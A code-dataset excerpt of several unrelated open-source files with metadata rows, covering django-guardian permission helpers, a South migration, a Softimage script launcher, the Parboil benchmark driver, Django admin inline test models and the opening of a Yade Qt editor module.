return User._meta.get_field_by_name('groups')[0].related_query_name()
def get_identity(identity):
"""
Returns (user_obj, None) or (None, group_obj) tuple depending on what is
given. Also accepts AnonymousUser instance but would return ``User``
instead - it is convenient and needed for authorization backend to support
anonymous users.
:param identity: either ``User`` or ``Group`` instance
:raises ``NotUserNorGroup``: if cannot return proper identity instance
**Examples**::
>>> user = User.objects.create(username='joe')
>>> get_identity(user)
(<User: joe>, None)
>>> group = Group.objects.create(name='users')
>>> get_identity(group)
(None, <Group: users>)
>>> anon = AnonymousUser()
>>> get_identity(anon)
(<User: AnonymousUser>, None)
>>> get_identity("not instance")
...
NotUserNorGroup: User/AnonymousUser or Group instance is required (got )
"""
if isinstance(identity, AnonymousUser):
identity = get_anonymous_user()
if isinstance(identity, User):
return identity, None
elif isinstance(identity, Group):
return None, identity
raise NotUserNorGroup("User/AnonymousUser or Group instance is required "
"(got %s)" % identity)
def get_403_or_None(request, perms, obj=None, login_url=None,
                    redirect_field_name=None, return_403=False, accept_global_perms=False):
    """
    Return ``None`` when the request's user holds all of ``perms`` (checked
    globally first when ``accept_global_perms`` is set, then against ``obj``);
    otherwise return a 403 response or a redirect to ``login_url``, depending
    on ``return_403``.
    """
    login_url = login_url or settings.LOGIN_URL
    redirect_field_name = redirect_field_name or REDIRECT_FIELD_NAME
# Handles both original and with object provided permission check
# as ``obj`` defaults to None
has_permissions = False
# global perms check first (if accept_global_perms)
if accept_global_perms:
has_permissions = all(request.user.has_perm(perm) for perm in perms)
# if still no permission granted, try obj perms
if not has_permissions:
has_permissions = all(request.user.has_perm(perm, obj) for perm in perms)
if not has_permissions:
if return_403:
if guardian_settings.RENDER_403:
try:
response = render_to_response(
guardian_settings.TEMPLATE_403, {},
RequestContext(request))
response.status_code = 403
return response
except TemplateDoesNotExist, e:
if settings.DEBUG:
raise e
elif guardian_settings.RAISE_403:
raise PermissionDenied
return HttpResponseForbidden()
else:
path = urlquote(request.get_full_path())
tup = login_url, redirect_field_name, path
return HttpResponseRedirect("%s?%s=%s" % tup)
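# Hedged usage sketch (not part of the original module): in a view, the helper
# is typically called first and its return value short-circuits the view:
#
#   forbidden = get_403_or_None(request, ['auth.change_user'], obj=some_user,
#                               return_403=True)
#   if forbidden is not None:
#       return forbidden
#   # ... continue with the permitted view logic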
def clean_orphan_obj_perms():
"""
Seeks and removes all object permissions entries pointing at non-existing
targets.
Returns number of removed objects.
"""
from guardian.models import UserObjectPermission
from guardian.models import GroupObjectPermission
deleted = 0
# TODO: optimise
for perm in chain(UserObjectPermission.objects.all(),
GroupObjectPermission.objects.all()):
if perm.content_object is None:
logger.debug("Removing %s (pk=%d)" % (perm, perm.pk))
perm.delete()
deleted += 1
logger.info("Total removed orphan object permissions instances: %d" %
deleted)
return deleted
|
bsd-2-clause
| 8,977,540,974,672,123,000
| 32.324138
| 81
| 0.666598
| false
| 4.368897
| false
| false
| false
|
hamole/pbl8
|
pbl8_project/pbl/migrations/0003_auto.py
|
1
|
3700
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding M2M table for field studies_for on 'Treatment'
m2m_table_name = db.shorten_name(u'pbl_treatment_studies_for')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)),
('study', models.ForeignKey(orm[u'pbl.study'], null=False))
))
db.create_unique(m2m_table_name, ['treatment_id', 'study_id'])
# Adding M2M table for field studies_against on 'Treatment'
m2m_table_name = db.shorten_name(u'pbl_treatment_studies_against')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)),
('study', models.ForeignKey(orm[u'pbl.study'], null=False))
))
db.create_unique(m2m_table_name, ['treatment_id', 'study_id'])
# Removing M2M table for field treatment on 'Study'
db.delete_table(db.shorten_name(u'pbl_study_treatment'))
def backwards(self, orm):
# Removing M2M table for field studies_for on 'Treatment'
db.delete_table(db.shorten_name(u'pbl_treatment_studies_for'))
# Removing M2M table for field studies_against on 'Treatment'
db.delete_table(db.shorten_name(u'pbl_treatment_studies_against'))
# Adding M2M table for field treatment on 'Study'
m2m_table_name = db.shorten_name(u'pbl_study_treatment')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('study', models.ForeignKey(orm[u'pbl.study'], null=False)),
('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False))
))
db.create_unique(m2m_table_name, ['study_id', 'treatment_id'])
models = {
u'pbl.study': {
'Meta': {'ordering': "('title',)", 'object_name': 'Study'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'funder': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'year': ('django.db.models.fields.IntegerField', [], {'default': '2014', 'max_length': '4'})
},
u'pbl.treatment': {
'Meta': {'ordering': "('name',)", 'object_name': 'Treatment'},
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'studies_against': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_against+'", 'blank': 'True', 'to': u"orm['pbl.Study']"}),
'studies_for': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_for+'", 'blank': 'True', 'to': u"orm['pbl.Study']"})
}
}
complete_apps = ['pbl']
|
mit
| -9,074,300,691,962,626,000
| 51.126761
| 195
| 0.592703
| false
| 3.285968
| false
| false
| false
|
blurstudio/cross3d
|
cross3d/softimage/external.py
|
1
|
4267
|
##
# \namespace cross3d.softimage.external
#
# \remarks This class can be used even outside of softimage. It gives you info on where
# softimage is installed, and allows you to run scripts in softimage.
# To Access this class use: cross3d.external('softimage')
#
# \author dougl
# \author Blur Studio
# \date 01/21/14
#
#------------------------------------------------------------------------------------------------------------------------
import os
import subprocess
import xml.etree.cElementTree as ET
from cross3d import Exceptions
from cross3d.constants import ScriptLanguage
from cross3d.abstract.external import External as AbstractExternal
#------------------------------------------------------------------------------------------------------------------------
class External(AbstractExternal):
	# If the software is installed but unused, don't pick it up when no explicit version is requested
_ignoredVersions = set(os.environ.get('CROSS3D_STUDIO_IGNORED_SOFTIMAGE', '').split(','))
	# map version numbers to release years
_yearForVersion = {'8': '2010', '9': '2011', '10': '2012', '11': '2013', '12': '2014', '13': '2015'}
@classmethod
def name(cls):
return 'Softimage'
@classmethod
def getFileVersion(cls, filepath):
"""
Reads the xsi version of an xsi file from the associated scntoc.
"""
scntoc_path = filepath + 'toc'
if os.path.isfile(scntoc_path):
tree = ET.parse(scntoc_path)
root = tree.getroot()
return root.get('xsi_version')
return None
@classmethod
def runScript(cls, script, version=None, architecture=64, language=ScriptLanguage.Python, debug=False, headless=True):
if os.path.exists(script):
scriptPath = script
else:
scriptPath = cls.scriptPath()
with open(scriptPath, "w") as fle:
fle.write(script)
binary = os.path.join(cls.binariesPath(version, architecture), 'xsibatch.exe' if headless else 'xsi.exe')
scriptArgumentName = '-script' if headless else '-uiscript'
		# '-continue' makes sure there are no prompts.
command = [binary, '-continue', scriptArgumentName, scriptPath]
		# '-processing' means it will not show the GUI and will not grab a license.
if headless:
command.insert(1, '-processing')
process = subprocess.Popen(command, stdout=subprocess.PIPE)
# TODO: This is the way to check for success. But it is blocking.
# Writing the log file.
with open(cls.scriptLog(), 'w') as fle:
fle.write(process.stdout.read())
# Checking the error in the log file.
with open(cls.scriptLog()) as fle:
content = fle.read()
return False if 'FATAL' in content else True
@classmethod
def binariesPath(cls, version=None, architecture=64, language='English'):
""" Finds the install path for various software installations. If version is None, the default
it will return the latest installed version of the software. Raises cross3d.Exceptions.SoftwareNotInstalled
if the software is not installed.
:param version: The version of the software. Default is None
:param architecture: The bit type to query the registry for(32, 64). Default is 64
:param language: Optional language that may be required for specific softwares.
"""
from cross3d.migrate import winregistry
hive = 'HKEY_LOCAL_MACHINE'
hkey = r'Software\Autodesk\Softimage\InstallPaths'
ret = None
if version == None:
# Find the latest version
versions = winregistry.listRegKeyValues(hive, hkey, architecture=architecture)
for version in sorted(versions, key= lambda i: i[0], reverse=True):
if version[0] not in cls._ignoredVersions:
ret = version[1]
break
else:
version = cls._yearForVersion.get(unicode(version), version)
try:
ret = winregistry.registryValue(hive, hkey, unicode(version), architecture)[0]
except WindowsError:
raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language)
		# If the version is not installed the registry lookup can yield '.', which
		# must not be treated as a valid install path.
		if ret and os.path.normpath(ret) != '.':
			return os.path.join(os.path.normpath(ret), 'Application', 'bin')
raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language)
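# --- Hedged usage sketch (not part of the original file) ---
# Per the header above, this class is normally reached via
# cross3d.external('softimage'). A headless batch run might then look like
# (version number and script content are assumed):
#
#   softimage = cross3d.external('softimage')
#   ok = softimage.runScript("Application.LogMessage('hello')", version=2014)
#   print 'script succeeded:', ok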
|
mit
| -2,558,668,745,692,272,000
| 36.790909
| 121
| 0.669088
| false
| 3.591751
| false
| false
| false
|
Geof23/SESABench_II
|
parboil/driver/benchmark.py
|
1
|
19162
|
# (c) 2007 The Board of Trustees of the University of Illinois.
import sys
import os
from os import path
import re
from itertools import imap, repeat, chain
import globals
import process
import parboilfile as pbf
from futures import Future
from error import ErrorType
class Benchmark(object):
"""A benchmark.
If the benchmark is malformed or otherwise invalid, only the 'name' and
'invalid' fields will be set. Otherwise all fields will be set.
Fields:
name The name of the benchmark. This is also the benchmark
directory name.
invalid None if the benchmark is valid; otherwise, an exception
describing why the benchmark is invalid.
path Full path of the benchmark directory.
descr A description of the benchmark.
impls A dictionary of benchmark source implementations.
datas A dictionary of data sets used to run the benchmark."""
def __init__(self, name, path = None, impls = [], datasets = [],
description=None, invalid=None):
self.name = name
self.invalid = invalid
if invalid is None:
self.path = path
self.impls = dict(imap(lambda i: (i.name, i), impls))
self.datas = dict(imap(lambda i: (i.name, i), datasets))
self.descr = description
def createFromName(name):
"""Scan the benchmark directory for the benchmark named 'name'
and create a benchmark object for it."""
bmkdir = globals.benchdir.getChildByName(name)
datadir = globals.datadir.getChildByName(name)
descr = process.read_description_file(bmkdir)
try:
# Scan implementations of the benchmark
impls = [BenchImpl.createFromDir(impl)
for impl in process.scan_for_benchmark_versions(bmkdir)]
# Scan data sets of the benchmark
datas = [BenchDataset.createFromDir(data)
for data in process.scan_for_benchmark_datasets(datadir)]
# If no exception occurred, the benchmark is valid
return Benchmark(name, bmkdir.getPath(), impls, datas, descr)
finally:
pass
#except Exception, e:
# return Benchmark(name, invalid=e)
createFromName = staticmethod(createFromName)
def describe(self):
"""Return a string describing this benchmark."""
if self.invalid:
return "Error in benchmark:\n" + str(self.invalid)
if self.descr is None:
header = "Benchmark '" + self.name + "'"
else:
header = self.descr
impls = " ".join([impl.name for impl in self.impls.itervalues()])
datas = " ".join([data.name for data in self.datas.itervalues()])
return header + "\nVersions: " + impls + "\nData sets: " + datas
def instance_check(x):
if not isinstance(x, Benchmark):
raise TypeError, "argument must be an instance of Benchmark"
instance_check = staticmethod(instance_check)
class BenchImpl(object):
"""An implementation of a benchmark."""
def __init__(self, dir, description=None):
if not isinstance(dir, pbf.Directory):
            raise TypeError, "dir must be a pbf.Directory"
self.name = dir.getName()
self.dir = dir
self.descr = description
def createFromDir(dir):
"""Scan the directory containing a benchmark implementation
and create a BenchImpl object from it."""
# Get the description from a file, if provided
descr = process.read_description_file(dir)
return BenchImpl(dir, descr)
createFromDir = staticmethod(createFromDir)
def makefile(self, benchmark, target=None, action=None, platform=None, opt={}):
"""Run this implementation's makefile."""
self.platform = platform
Benchmark.instance_check(benchmark)
def perform():
srcdir = path.join('src', self.name)
builddir = path.join('build', self.name)
if self.platform == None: platform = 'default'
else: platform = self.platform
env={'SRCDIR':srcdir,
'BUILDDIR':builddir + '_' + platform,
'BIN':path.join(builddir+'_'+platform,benchmark.name),
'PARBOIL_ROOT':globals.root,
'PLATFORM':platform,
'BUILD':self.name}
env.update(opt)
mkfile = globals.root + os.sep + 'common' + os.sep + 'mk'
# Run the makefile to build the benchmark
ret = process.makefile(target=target,
action=action,
filepath=path.join(mkfile, "Makefile"),
env=env)
if ret == True:
return ErrorType.Success
else:
return ErrorType.CompileError
# Go to the benchmark directory before building
return process.with_path(benchmark.path, perform)
def build(self, benchmark, platform):
"""Build an executable of this benchmark implementation."""
return self.makefile(benchmark, action='build', platform=platform)
def isBuilt(self, benchmark, platform):
"""Determine whether the executable is up to date."""
return self.makefile(benchmark, action='q', platform=platform) == ErrorType.Success
def clean(self, benchmark, platform):
"""Remove build files for this benchmark implementation."""
return self.makefile(benchmark, action='clean', platform=platform)
def run(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None):
"""Run this benchmark implementation.
        Return an ErrorType code indicating whether the run completed
        normally or how it failed."""
if platform == None:
self.platform = 'default'
else:
self.platform = platform
# Ensure that the benchmark has been built
if not self.isBuilt(benchmark, platform):
rc = self.build(benchmark, platform)
# Stop if 'make' failed
if rc != ErrorType.Success: return rc
def perform():
if self.platform == None:
platform = 'default'
else:
platform = self.platform
# Run the program
#exename = path.join('build', self.name+'_'+platform, benchmark.name)
#args = [exename] + extra_opts + dataset.getCommandLineArguments(benchmark, do_output)
#rc = process.spawnwaitv(exename, args)
args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output)
            args = ' '.join(args)
###
try:
rc = self.makefile(benchmark, action='run', platform=platform, opt={"ARGS":args})
except KeyboardInterrupt:
rc = ErrorType.Killed
# Program exited with error?
# if rc != 0: return ErrorType.RunFailed
# return ErrorType.Success
return rc
return process.with_path(benchmark.path, perform)
def debug(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None):
"""Debug this benchmark implementation."""
if platform == None:
self.platform = 'default'
else:
self.platform = platform
# Ensure that the benchmark has been built
if not self.isBuilt(benchmark, platform):
rc = self.build(benchmark, platform)
# Stop if 'make' failed
if rc != ErrorType.Success: return rc
def perform():
if self.platform == None:
platform = 'default'
else:
platform = self.platform
# Run the program
args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output)
            args = ' '.join(args)
###
rc = self.makefile(benchmark, action='debug', platform=platform, opt={"ARGS":args})
# Program exited with error?
if rc != 0: return ErrorType.RunFailed
return ErrorType.Success
return process.with_path(benchmark.path, perform)
def check(self, benchmark, dataset):
"""Check the output from the last run of this benchmark
implementation.
Return True if the output checks successfully or False
otherwise."""
def perform():
output_file = dataset.getTemporaryOutputFile(benchmark).getPath()
reference_file = dataset.getReferenceOutputPath()
compare = os.path.join('tools', 'compare-output')
rc = process.spawnwaitl(compare,
compare, reference_file, output_file)
# Program exited with error, or mismatch in output?
if rc != 0: return False
return True
return process.with_path(benchmark.path, perform)
def __str__(self):
return "<BenchImpl '" + self.name + "'>"
class BenchDataset(object):
"""Data sets for running a benchmark."""
def __init__(self, dir, in_files=[], out_files=[], parameters=[],
description=None):
if not isinstance(dir, pbf.Directory):
raise TypeError, "dir must be a pbf.Directory"
self.name = dir.getName()
self.dir = dir
self.inFiles = in_files
self.outFiles = out_files
self.parameters = parameters
self.descr = description
def createFromDir(dir):
"""Scan the directory containing a dataset
and create a BenchDataset object from it."""
# Identify the paths where files may be found
input_dir = dir.getChildByName('input')
output_dir = dir.getChildByName('output')
#benchmark_path = path.join(globals.root, 'benchmarks', name)
def check_default_input_files():
# This function is called to see if the input file set
# guessed by scanning the input directory can be used
if invalid_default_input_files:
raise ValueError, "Cannot infer command line when there are multiple input files in a data set\n(Fix by adding an input DESCRIPTION file)"
if input_dir.exists():
input_descr = process.read_description_file(input_dir)
input_files = input_dir.scanAndReturnNames()
# If more than one input file was found, cannot use the default
# input file list produced by scanning the directory
invalid_default_input_files = len(input_files) > 1
else:
# If there's no input directory, assume the benchmark
# takes no input
input_descr = None
input_files = []
invalid_default_input_files = False
# Read the text of the input description file
if input_descr is not None:
(parameters, input_files1, input_descr) = \
unpack_dataset_description(input_descr, input_files=None)
if input_files1 is None:
# No override value given; use the default
check_default_input_files()
else:
input_files = input_files1
else:
check_default_input_files()
parameters = []
# Look for output files
output_descr = process.read_description_file(output_dir)
output_files = output_dir.scanAndReturnNames()
if len(output_files) > 1:
raise ValueError, "Multiple output files not supported"
# Concatenate input and output descriptions
if input_descr and output_descr:
descr = input_descr + "\n\n" + output_descr
else:
descr = input_descr or output_descr
return BenchDataset(dir, input_files, output_files, parameters, descr)
createFromDir = staticmethod(createFromDir)
def getName(self):
"""Get the name of this dataset."""
return self.name
def getTemporaryOutputDir(self, benchmark):
"""Get the pbf.Directory for the output of a benchmark run.
This function should always return the same pbf.Directory if its parameters
are the same. The output path is not the path where the reference
output is stored."""
rundir = globals.benchdir.getChildByName(benchmark.name).getChildByName('run')
if rundir.getChildByName(self.name) is None:
datasetpath = path.join(rundir.getPath(), self.name)
filepath = path.join(datasetpath, self.outFiles[0])
rundir.addChild(pbf.Directory(datasetpath, [pbf.File(filepath, False)]))
return rundir.getChildByName(self.name)
def getTemporaryOutputFile(self, benchmark):
"""Get the pbf.File for the output of a benchmark run.
This function should always return the same pbf.File if its parameters
        are the same. The output path is not where the reference output
is stored."""
return self.getTemporaryOutputDir(benchmark).getChildByName(self.outFiles[0])
def getReferenceOutputPath(self):
"""Get the name of the reference file, to which the output of a
benchmark run should be compared."""
return path.join(self.dir.getPath(), 'output', self.outFiles[0])
def getCommandLineArguments(self, benchmark, do_output=True):
"""Get the command line arguments that should be passed to the
executable to run this data set. If 'output' is True, then
the executable will be passed flags to save its output to a file.
Directories to hold ouptut files are created if they do not exist."""
args = []
# Add arguments to pass input files to the benchmark
if self.inFiles:
in_files = ",".join([path.join(self.dir.getPath(),'input', x)
for x in self.inFiles])
args.append("-i")
args.append(in_files)
# Add arguments to store the output somewhere, if output is
# desired
if do_output and self.outFiles:
if len(self.outFiles) != 1:
raise ValueError, "only one output file is supported"
out_file = self.getTemporaryOutputFile(benchmark)
args.append("-o")
args.append(out_file.getPath())
# Ensure that a directory exists for the output
self.getTemporaryOutputDir(benchmark).touch()
args += self.parameters
return args
def __str__(self):
return "<BenchData '" + self.name + "'>"
def unpack_dataset_description(descr, parameters=[], input_files=[]):
"""Read information from the raw contents of a data set description
file. Optional 'parameters' and 'input_files' arguments may be
given, which will be retained unless overridden by the description
file."""
leftover = []
split_at_colon = re.compile(r"^\s*([a-zA-Z]+)\s*:(.*)$")
# Initialize these to default empty strings
parameter_text = None
input_file_text = None
# Scan the description line by line
for line in descr.split('\n'):
m = split_at_colon.match(line)
if m is None: continue
# This line appears to declare something that should be
# interpreted
keyword = m.group(1)
if keyword == "Parameters":
parameter_text = m.group(2)
elif keyword == "Inputs":
input_file_text = m.group(2)
# else, ignore the line
# Split the strings into (possibly) multiple arguments, discarding
# whitespace
if parameter_text is not None: parameters = parameter_text.split()
if input_file_text is not None: input_files = input_file_text.split()
return (parameters, input_files, descr)
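# Hedged example (not from the repository): given the keywords parsed above,
# a dataset DESCRIPTION file could read
#
#   Parameters: -x 512 -y 512
#   Inputs: frame0.bin frame1.bin
#
# which yields parameters ['-x', '512', '-y', '512'] and those two input files.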
def version_scanner():
"""version_scanner() -> (path -> pbf.Directory)
Return a function to find benchmark versions in the src
directory for the benchmark."""
return lambda x: pbf.scan_file(x, True, lambda y: pbf.Directory(y), ['.svn'])
def find_benchmarks():
"""Find benchmarks in the repository. The benchmarks are
identified, but their contents are not scanned immediately. A
dictionary is returned mapping benchmark names to futures
containing the benchmarks."""
if not globals.root:
raise ValueError, "root directory has not been set"
# Scan all benchmarks in the 'benchmarks' directory and
# lazily create benchmark objects.
db = {}
try:
globals.benchdir.scan()
globals.datadir.scan()
for bmkdir in globals.benchdir.getScannedChildren():
bmk = Future(lambda bmkdir=bmkdir: Benchmark.createFromName(bmkdir.getName()))
db[bmkdir.getName()] = bmk
except OSError, e:
sys.stdout.write("Benchmark directory not found!\n\n")
return {}
return db
def _desc_file(dpath):
"""_desc_file(dpath)
Returns a pbf.File for an optional description file in the directory dpath."""
return pbf.File(path.join(dpath,'DESCRIPTION'), False)
def benchmark_scanner():
"""benchmark_scanner -> (path -> pbf.Directory)
Returns a function which will scan a filename and create a pbf.Directory
for a benchmark represented by that name."""
def create_benchmark_dir(dpath):
expected = [pbf.Directory(path.join(dpath,'src'), [], version_scanner()),
pbf.Directory(path.join(dpath,'tools'),
[pbf.File(path.join(dpath,'compare-output'))]),
pbf.Directory(path.join(dpath,'build'), must_exist=False),
pbf.Directory(path.join(dpath,'run'), must_exist=False),
_desc_file(dpath)]
return pbf.Directory(dpath, expected)
return lambda x: pbf.scan_file(x, True, create_benchmark_dir,['_darcs','.svn'])
def dataset_scanner():
"""dataset_scanner -> (path -> pbf.Directory)
Returns a function which will scan a filename and create a pbf.Directory
for a folder containing datasets for the benchmark of the same name."""
def create_dataset_dir(dpath):
simple_scan = lambda x: pbf.scan_file(x)
expected = [pbf.Directory(path.join(dpath,'input'),
[_desc_file(path.join(dpath,'input'))], simple_scan),
pbf.Directory(path.join(dpath,'output'), [], simple_scan),
_desc_file(dpath)]
return pbf.Directory(dpath, expected)
return lambda x: pbf.scan_file(x, True, create_dataset_dir, ['.svn', '_darcs'])
def dataset_repo_scanner():
"""dataset_repo_scanner -> (path -> pbf.Directory)
Returns a function which will scan a filename and create a pbf.Directory
for a folder containing a dataset repository for parboil benchmarks."""
benchmark_dsets_scanner = lambda x: pbf.Directory(x, [], dataset_scanner())
return lambda x: pbf.scan_file(x, True, benchmark_dsets_scanner)
|
mit
| -8,829,396,101,898,536,000
| 35.921002
| 154
| 0.608235
| false
| 4.42132
| false
| false
| false
|
theo-l/django
|
tests/admin_inlines/models.py
|
10
|
7855
|
"""
Testing of admin inline formsets.
"""
import random
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
class Parent(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Teacher(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Child(models.Model):
name = models.CharField(max_length=50)
teacher = models.ForeignKey(Teacher, models.CASCADE)
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
parent = GenericForeignKey()
def __str__(self):
return 'I am %s, a child of %s' % (self.name, self.parent)
class Book(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Author(models.Model):
name = models.CharField(max_length=50)
books = models.ManyToManyField(Book)
class NonAutoPKBook(models.Model):
rand_pk = models.IntegerField(primary_key=True, editable=False)
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=50)
def save(self, *args, **kwargs):
while not self.rand_pk:
test_pk = random.randint(1, 99999)
if not NonAutoPKBook.objects.filter(rand_pk=test_pk).exists():
self.rand_pk = test_pk
super().save(*args, **kwargs)
class NonAutoPKBookChild(NonAutoPKBook):
pass
class EditablePKBook(models.Model):
manual_pk = models.IntegerField(primary_key=True)
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=50)
class Holder(models.Model):
dummy = models.IntegerField()
class Inner(models.Model):
dummy = models.IntegerField()
holder = models.ForeignKey(Holder, models.CASCADE)
readonly = models.CharField("Inner readonly label", max_length=1)
def get_absolute_url(self):
return '/inner/'
class Holder2(models.Model):
dummy = models.IntegerField()
class Inner2(models.Model):
dummy = models.IntegerField()
holder = models.ForeignKey(Holder2, models.CASCADE)
class Holder3(models.Model):
dummy = models.IntegerField()
class Inner3(models.Model):
dummy = models.IntegerField()
holder = models.ForeignKey(Holder3, models.CASCADE)
# Models for ticket #8190
class Holder4(models.Model):
dummy = models.IntegerField()
class Inner4Stacked(models.Model):
dummy = models.IntegerField(help_text="Awesome stacked help text is awesome.")
holder = models.ForeignKey(Holder4, models.CASCADE)
class Meta:
constraints = [
models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_stacked_dummy_per_holder')
]
class Inner4Tabular(models.Model):
dummy = models.IntegerField(help_text="Awesome tabular help text is awesome.")
holder = models.ForeignKey(Holder4, models.CASCADE)
class Meta:
constraints = [
models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_tabular_dummy_per_holder')
]
# Models for ticket #31441
class Holder5(models.Model):
dummy = models.IntegerField()
class Inner5Stacked(models.Model):
name = models.CharField(max_length=10)
select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10)
text = models.TextField()
dummy = models.IntegerField()
holder = models.ForeignKey(Holder5, models.CASCADE)
class Inner5Tabular(models.Model):
name = models.CharField(max_length=10)
select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10)
text = models.TextField()
dummy = models.IntegerField()
holder = models.ForeignKey(Holder5, models.CASCADE)
# Models for #12749
class Person(models.Model):
firstname = models.CharField(max_length=15)
class OutfitItem(models.Model):
name = models.CharField(max_length=15)
class Fashionista(models.Model):
person = models.OneToOneField(Person, models.CASCADE, primary_key=True)
weaknesses = models.ManyToManyField(OutfitItem, through='ShoppingWeakness', blank=True)
class ShoppingWeakness(models.Model):
fashionista = models.ForeignKey(Fashionista, models.CASCADE)
item = models.ForeignKey(OutfitItem, models.CASCADE)
# Models for #13510
class TitleCollection(models.Model):
pass
class Title(models.Model):
collection = models.ForeignKey(TitleCollection, models.SET_NULL, blank=True, null=True)
title1 = models.CharField(max_length=100)
title2 = models.CharField(max_length=100)
# Models for #15424
class Poll(models.Model):
name = models.CharField(max_length=40)
class Question(models.Model):
text = models.CharField(max_length=40)
poll = models.ForeignKey(Poll, models.CASCADE)
class Novel(models.Model):
name = models.CharField(max_length=40)
class NovelReadonlyChapter(Novel):
class Meta:
proxy = True
class Chapter(models.Model):
name = models.CharField(max_length=40)
novel = models.ForeignKey(Novel, models.CASCADE)
class FootNote(models.Model):
"""
Model added for ticket 19838
"""
chapter = models.ForeignKey(Chapter, models.PROTECT)
note = models.CharField(max_length=40)
# Models for #16838
class CapoFamiglia(models.Model):
name = models.CharField(max_length=100)
class Consigliere(models.Model):
name = models.CharField(max_length=100, help_text='Help text for Consigliere')
capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+')
class SottoCapo(models.Model):
name = models.CharField(max_length=100)
capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+')
class ReadOnlyInline(models.Model):
name = models.CharField(max_length=100, help_text='Help text for ReadOnlyInline')
capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE)
# Models for #18433
class ParentModelWithCustomPk(models.Model):
my_own_pk = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
class ChildModel1(models.Model):
my_own_pk = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE)
def get_absolute_url(self):
return '/child_model1/'
class ChildModel2(models.Model):
my_own_pk = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE)
def get_absolute_url(self):
return '/child_model2/'
# Models for #19425
class BinaryTree(models.Model):
name = models.CharField(max_length=100)
parent = models.ForeignKey('self', models.SET_NULL, null=True, blank=True)
# Models for #19524
class LifeForm(models.Model):
pass
class ExtraTerrestrial(LifeForm):
name = models.CharField(max_length=100)
class Sighting(models.Model):
et = models.ForeignKey(ExtraTerrestrial, models.CASCADE)
place = models.CharField(max_length=100)
# Models for #18263
class SomeParentModel(models.Model):
name = models.CharField(max_length=1)
class SomeChildModel(models.Model):
name = models.CharField(max_length=1)
position = models.PositiveIntegerField()
parent = models.ForeignKey(SomeParentModel, models.CASCADE)
readonly_field = models.CharField(max_length=1)
# Other models
class ProfileCollection(models.Model):
pass
class Profile(models.Model):
collection = models.ForeignKey(ProfileCollection, models.SET_NULL, blank=True, null=True)
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
|
bsd-3-clause
| 4,038,649,694,587,854,300
| 24.669935
| 103
| 0.708466
| false
| 3.554299
| false
| false
| false
|
bchareyre/ratchet
|
gui/qt4/SerializableEditor.py
|
1
|
34633
|
# encoding: utf-8
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4 import QtGui
import re,itertools
import logging
logging.trace=logging.debug
logging.basicConfig(level=logging.INFO)
from yade import *
import yade.qt
try:
from minieigen import *
except ImportError:
from miniEigen import *
seqSerializableShowType=True # show type headings in serializable sequences (takes vertical space, but makes the type hyperlinked)
# BUG: cursor is moved to the beginning of the input field even if it has focus
#
# checking for focus seems to return True always and cursor is never moved
#
# the 'True or' part effectively disables the condition (so the cursor is always moved); this might be fixed properly in the future
#
# if True or w.hasFocus(): w.home(False)
#
#
def makeWrapperHref(text,className,attr=None,static=False):
"""Create clickable HTML hyperlink to a Yade class or its attribute.
:param className: name of the class to link to.
:param attr: attribute to link to. If given, must exist directly in given *className*; if not given or empty, link to the class itself is created and *attr* is ignored.
:return: HTML with the hyperref.
"""
if not static: return '<a href="%s#yade.wrapper.%s%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,(('.'+attr) if attr else ''),text)
else: return '<a href="%s#ystaticattr-%s.%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,attr,text)
def serializableHref(ser,attr=None,text=None):
"""Return HTML href to a *ser* optionally to the attribute *attr*.
